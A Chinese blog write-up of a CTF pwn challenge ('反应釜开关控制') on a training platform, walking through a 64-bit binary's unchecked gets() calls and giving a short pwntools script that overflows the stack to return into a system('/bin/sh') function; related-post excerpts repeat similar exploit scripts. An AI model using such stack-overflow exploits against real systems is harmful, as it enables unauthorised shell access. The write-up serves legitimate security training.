攻防世界高手进阶区 ——反应釜开关控制

已于 2022-02-25 15:29:47 修改
阅读量484 收藏
点赞数 1
分类专栏: XCTF 文章标签: pwn unctf
于 2022-02-11 15:26:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62675330/article/details/122881587
版权

攻防世界高手进阶区 ——反应釜开关控制

在这里插入图片描述

题目没什么信息。在这里插入图片描述

1.分析文件

在这里插入图片描述

运行一下,可能为栈溢出的题。

checkse

在这里插入图片描述

无栈溢出保护,无地址随机化,只有堆栈不可执行。

栈溢出可能性大。

ida64

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-240h] BYREF
  char v5[512]; // [rsp+40h] [rbp-200h] BYREF

  write(1, "Please closing the reaction kettle\n", 0x23uLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", easy);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  gets(v5);
  return 0;
}

给出了easy函数的地址,gets存在栈溢出漏洞。

__int64 easy()
{
  char s[64]; // [rsp+0h] [rbp-1C0h] BYREF
  char v2[384]; // [rsp+40h] [rbp-180h] BYREF

  write(1, "You have closed the first switch\n", 0x21uLL);
  write(1, "Please closing the second reaction kettle\n", 0x2AuLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", normal);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  return gets(v2);
}

跟进函数easy,和main函数类似,给出normal地址,存在栈溢出漏洞。

__int64 normal()
{
  char s[64]; // [rsp+0h] [rbp-140h] BYREF
  char v2[256]; // [rsp+40h] [rbp-100h] BYREF

  write(1, "You have closed the first switch\n", 0x22uLL);
  write(1, "Please closing the third reaction kettle\n", 0x2AuLL);
  write(1, "The switch is:", 0xEuLL);
  sprintf(s, "%p\n", shell);
  write(1, s, 9uLL);
  write(1, ">", 2uLL);
  return gets(v2);
}

跟进函数normal,和前面的一样,暴露shell地址,存在漏洞。

int shell()
{
  return system("/bin/sh");
}

shell函数为获取shell。

2.解题思路

最初我以为要通过暴露出来的地址一步一步溢出到shell地址,结果看其他大神的wp发现可以直接用ida分析出来的地址,貌似编译的时候没有开启aslr。对于linux安全机制不太清楚,导致浪费了太多时间。

所以直接通过main函数的栈溢出漏洞返回到shell函数的地址就行了。

3.解题脚本

在这里插入图片描述

因为v5有512个字节,且为64系统,故填充512+8(ebp)个字节。

在这里插入图片描述

shell的地址为0x4005F6

from pwn import *
p = remote(" 111.200.241.244" , "55652")
context(os = 'linux' , log_level = "debug")
payload = "a"*0x200 + 'a'*8 + p64(0x4005F6)
p.sendafter("is:",payload)
p.interactive()
coke_pwn
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
非预期解 |攻防世界 pwn进阶 反应釜开关控制
Kni9hT's Blog
04-20 1001
文章目录菜鸡独白0x00.看题0x01.查看保护0x02.懵...非预期0x03.后记 菜鸡独白 好久没做题了,看大佬们天天在朋友圈晒比赛成绩,不由感叹WTCL! 今天下午无聊继续刷起ADworld。 0x00.看题 题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火...
攻防世界 web高手进阶 10分题 url
闵行小鱼塘
10-19 1570
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是url的writeup
[攻防世界]反应釜开关控制
逆向萌新的博客
06-21 436
[攻防世界]反应釜开关控制
[攻防世界 pwn]——反应釜开关控制
Y_peak的博客
02-23 359
[攻防世界 pwn]——反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit from pwn import * p = remote("111.200.241.244",31931) payload='a' * (0x200 + 8)+p64(0x4005F6) p.sendlineafter('>',payload) p.interactive() ...
攻防世界 Pwn 反应釜开关控制
MrTreebook的博客
12-12 425
攻防世界 Pwn 反应釜开关控制1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 只开启了NX,并且是64位程序 3.IDA分析 看到一个gets函数,并且没有边界限制 存在溢出可以利用 再往下看其他的函数 虽然题目给了很多函数,但是没开canary,没开PIE 没有什么难度,直接ret到后门函数即可 .text:00000000004005F6 public shell .text:0000000000
攻防世界 pwn——反应釜开关控制
最新发布
CNS-Enterprise BCC-1701-J
06-03 332
攻防世界 做题练习
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1318
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
攻防世界 web高手进阶 10分题 xss1
闵行小鱼塘
11-10 731
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是xss1的writeup
攻防世界 Misc高手进阶 3分题 3-11
闵行小鱼塘
11-15 1104
继续ctf的旅程,攻防世界Misc高手进阶的3分题,本篇是3-11的writeup
攻防世界PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2019
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
反应釜开关控制(xctf)
weixin_43868725的博客
05-24 749
0x0 程序保护和流程 保护: 流程: main() gets明显存在栈溢出。又在函数列表中找到了shell()函数。 0x1 利用过程 直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6) exp from pwn import * #sh=process('./a') sh=remote('124.126.19.106','53303') sh.recvuntil('>') payload=0x208*'a'+p64(0x4005F6) sh.sendli
1.反应釜开关控制
weixin_44864859的博客
07-27 376
1.反应釜开关控制 拿到这道题,ida分析之后感觉是有些奇怪的,因为题目就是简单的栈溢出,而且给了后门函数。所以就是简单的ret2text。 exp: from pwn import * context(log_level='debug',arch='amd64',os='linux') r = remote('220.249.52.133',37791) elf = ELF('./kaiguan') shell_addr = 0x04005F6 payload = 'A'*0x208 + p64(she
[XCTF-pwn] 3-反应釜开关控制
weixin_52640415的博客
03-03 152
溢出到后门 from pwn import * p = remote('111.200.241.244', 53046) p.sendline(flat(b'A'*(0x200+8), 0x4005f6)) p.interactive()
攻防世界-PWN-Challenge-Wirteup
07-29 825
目录 dice_game 反应釜开关控制 dice_game 这个提跟新手一个题很像,都是利用溢出覆盖随机数的种子,使得随机数产生的序列固定,在本地产生序列后脚本提交就可以了 ida查看程序 栈信息: 将seed覆盖为全0,使用c在kali中跑一下: #include <stdlib.h> #include <stdio.h> int main() { srand(0); for(int i = 0; i < 50; i++) { i.
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶 实时数据监测
Kni9hT's Blog
04-21 6589
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
64位程序rop链构造|攻防世界pwn进阶 pwn-100
Kni9hT's Blog
03-16 4040
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32位程序和64位程序...
攻防世界 web 不能按的按钮 disabled_button
05-11 8061
f12打开开发者工具 点击查看器这一栏 定位到它的图标处 双击进入 里面有代码如下: 一般有两种方法 方法一: 删除代码:disabled="" 然后点击网页上的flag图标就可以得到flag了 方法二: 将disabled=""改为disabled=“false” 然后点击网页上的flag图标就可以得到flag了 火狐开发者工具使用方法(不会太使用的可以看这边) https://blog...
汇编语言编程实现彩色语句 | 汇编语言(王爽版)实验8 && 实验9
Kni9hT's Blog
04-21 1208
文章目录实验8 分析一个奇怪的程序实验9 根据材料编程 实验8 分析一个奇怪的程序 assume cs:codesg codesg segment mov ax,4c00h int 21h start: mov ax,0 s: nop nop mov di,offset s mov si,offset s2 mov ax,cs:[si] mov cs:[di],a...
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值